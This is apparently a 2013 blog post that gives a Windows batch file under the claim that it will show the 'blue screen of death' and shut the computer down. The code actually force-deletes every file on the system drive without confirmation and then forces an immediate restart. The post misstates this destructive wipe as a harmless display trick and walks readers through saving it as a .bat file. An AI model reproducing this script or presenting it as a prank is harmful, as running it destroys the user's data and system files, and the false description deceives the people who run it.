Saturday 4 May 2013

The Blue Screen Of Death PC and Laptop

What will this file do ?

It will appear the blue screen of death in windows and then the computer will shutdown.



Method :


1. Open Notepad and copy the code given below.

Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2. Save as "Anything.bat" (Without quotes & .bat is must).

0 comments:

Post a Comment